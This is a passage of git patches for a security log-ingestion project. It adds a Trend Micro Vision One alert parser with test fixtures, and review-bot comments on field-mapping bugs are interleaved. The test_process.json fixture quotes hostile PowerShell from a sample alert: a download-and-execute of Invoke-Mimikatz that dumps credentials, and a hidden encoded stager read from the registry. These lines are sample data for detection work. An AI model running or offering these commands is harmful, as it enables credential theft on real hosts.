-    "value": "The user on device model {device.model.name} log in due to {event.reason}",
+    "value": "The user with id {user.id} on the {device.model.name} device log in : {event.reason}",
     "conditions": [
       {
         "field": "network.application",
@@ -386,6 +389,31 @@
       },
       {
         "field": "device.model.name"
+      },
+      {
+        "field": "user.id"
+      }
+    ]
+  },
+  {
+    "value": "The user with id {user.id} on the {host.name} host log in : {event.reason}",
+    "conditions": [
+      {
+        "field": "network.application",
+        "value": "chrome"
+      },
+      {
+        "field": "event.action",
+        "value": "CHROME_OS_LOGIN_EVENT"
+      },
+      {
+        "field": "event.reason"
+      },
+      {
+        "field": "device.model.name"
+      },
+      {
+        "field": "user.id"
       }
     ]
   },
From 90a003cc629a1666e04ae08bd97a170fb0c27cfe Mon Sep 17 00:00:00 2001
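Review bot: The description entry added at the end of the second hunk renders `{host.name}`, but its conditions still require `device.model.name` and never require `host.name`, so it can be selected for an event whose host.name is empty and render a blank placeholder; that condition should read `"field": "host.name"`. Its condition set is otherwise identical to the preceding `{device.model.name}` entry, so which of the two is chosen depends on how the consumer orders candidates, which this file does not show. The wording also drifts between the three templates (`with ID` / `with id`, `logged out due to:` / `log in :`); `logged in due to: {event.reason}` would keep them parallel. The enclosing JSON array starts and ends outside the hunk.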
From: lvoloshyn-sekoia
Date: Tue, 19 Nov 2024 09:48:10 +0200
Subject: [PATCH 055/150] Add format for Trend Micro Vision One
---
 .../trend-micro-vision-one/CHANGELOG.md | 8 ++
 .../trend-micro-vision-one/_meta/fields.yml | 29 +++++++
 .../trend-micro-vision-one/_meta/logo.png | Bin 0 -> 10452 bytes
 .../trend-micro-vision-one/_meta/manifest.yml | 9 ++
 .../_meta/smart-descriptions.json | 0
 .../trend-micro-vision-one/ingest/parser.yml | 79 ++++++++++++++++++
 .../tests/test_process.json | 66 +++++++++++++++
 .../tests/test_registry.json | 72 ++++++++++++++++
 8 files changed, 263 insertions(+)
 create mode 100644 Trend Micro/trend-micro-vision-one/CHANGELOG.md
 create mode 100644 Trend Micro/trend-micro-vision-one/_meta/fields.yml
 create mode 100644 Trend Micro/trend-micro-vision-one/_meta/logo.png
 create mode 100644 Trend Micro/trend-micro-vision-one/_meta/manifest.yml
 create mode 100644 Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json
 create mode 100644 Trend Micro/trend-micro-vision-one/ingest/parser.yml
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_process.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_registry.json
diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one/CHANGELOG.md
new file mode 100644
index 000000000..11bddf32c
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/CHANGELOG.md
@@ -0,0 +1,8 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml
new file mode 100644
index 000000000..f18d3cb5d
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml
@@ -0,0 +1,29 @@
+trendmicro.vision_one.alert_id:
+  description: ''
+  name: trendmicro.vision_one.alert_id
+  type: keyword
+
+trendmicro.vision_one.case_id:
+  description: ''
+  name: trendmicro.vision_one.case_id
+  type: keyword
+
+trendmicro.vision_one.incident_id:
+  description: ''
+  name: trendmicro.vision_one.incident_id
+  type: keyword
+
+trendmicro.vision_one.investigation_status:
+  description: ''
+  name: trendmicro.vision_one.investigation_status
+  type: keyword
+
+trendmicro.vision_one.severity:
+  description: ''
+  name: trendmicro.vision_one.severity
+  type: keyword
+
+trendmicro.vision_one.status:
+  description: ''
+  name: trendmicro.vision_one.status
+  type: keyword
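Review bot: All six `description` values in this new fields.yml are empty strings, so the custom `trendmicro.vision_one.*` fields are declared without telling an analyst what they hold. The parser added by the same patch fills them from the alert's `id`, `caseId`, `incidentId`, `investigationStatus`, `severity` and `status` attributes, so a one-line description per field can be written from that mapping, e.g. `description: 'Identifier of the Vision One alert (the alert id attribute)'` for `alert_id` and `description: 'Severity assigned to the alert by Vision One'` for `severity`.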
diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..e51bb3eb7725123b5278a71034969dfbbd5ca157 GIT binary patch literal 10452 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 wM>ZBJ6Qe~@DrfdBvi literal 0 HcmV?d00001 diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml new file mode 100644 index 000000000..c0121a28d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -0,0 +1,9 @@ +uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +name: Trend Micro Vision One +slug: trend-micro-vision-one + +description: >- + Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + +data_sources: + Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json new file mode 100644 index 000000000..e69de29bb diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml new file mode 100644 index 000000000..38a31dd29 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
@@ -0,0 +1,79 @@
+name: trend-micro-vision-one
+ignored_values: []
+pipeline:
+  - name: parsed_event
+    external:
+      name: json.parse-json
+      properties:
+        input_field: "{{original.message}}"
+        output_field: message
+
+  - name: set_ecs_fields
+
+stages:
+  set_ecs_fields:
+    actions:
+      - set:
+          event.kind: alert
+          event.category: ["intrusion_detection"]
+          event.type: ["info"]
+          observer.vendor: "TrendMicro"
+          observer.product: "Vision One"
+
+      - set:
+          "@timestamp": "{{parsed_event.message.createdDateTime}}"
+
+          organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}"
+          organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}"
+          host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}"
+          host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}"
+
+          user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}"
+          container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}"
+          container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}"
+
+          rule.name: "{{parsed_event.message.model}}"
+          rule.id: "{{parsed_event.message.model.modelId}}"
+
+          event.url: "{{parsed_event.message.model.workbenchLink}}"
+
+          process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}"
+          process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}"
+
+          registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}"
+          registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}"
+
+          registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}"
+
+          registry.path: >
+            {%- set path = [] -%}
+            {%- for indicator in parsed_event.message.indicators -%}
+            {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %}
+            {%- endfor -%}
+            {%- for indicator in parsed_event.message.indicators -%}
+            {%- if indicator.type == 'registry_value' -%}{%- set path = path.append(indicator.value) -%}{% endif %}
+            {%- endfor -%}
+            {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%}
+
+          # @todo should be along with registry.data.type to REG_SZ
+          registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}"
+
+          file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}"
+          file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}"
+          file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}"
+          file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}"
+
+          process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}"
+          process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}"
+          process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}"
+          process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}"
+          process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}"
+
+          user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}"
+
+          trendmicro.vision_one.severity: "{{parsed_event.message.severity}}"
+          trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}"
+          trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}"
+          trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}"
+          trendmicro.vision_one.status: "{{parsed_event.message.status}}"
+          trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}"
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
new file mode 100644
index 000000000..5eca6b2ea
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json
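Review bot: `rule.id` and `event.url` dereference `parsed_event.message.model.modelId` and `parsed_event.message.model.workbenchLink`, but in the alert payload `model` is a plain string (the model name that `rule.name` already uses) while `modelId` and `workbenchLink` are top-level attributes, so both expressions resolve to nothing; the expected output in tests/test_process.json accordingly contains neither `rule.id` nor `event.url`. The lines should read `rule.id: "{{parsed_event.message.modelId}}"` and `event.url: "{{parsed_event.message.workbenchLink}}"`, with the test expectations extended to cover them. Separately, the `# @todo should be along with registry.data.type to REG_SZ` comment ships in the parser as-is; either set `registry.data.type` alongside `registry.data.strings` or track the gap in the CHANGELOG rather than leaving a todo in the mapping.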
@@ -0,0 +1,66 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], 
\"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": 
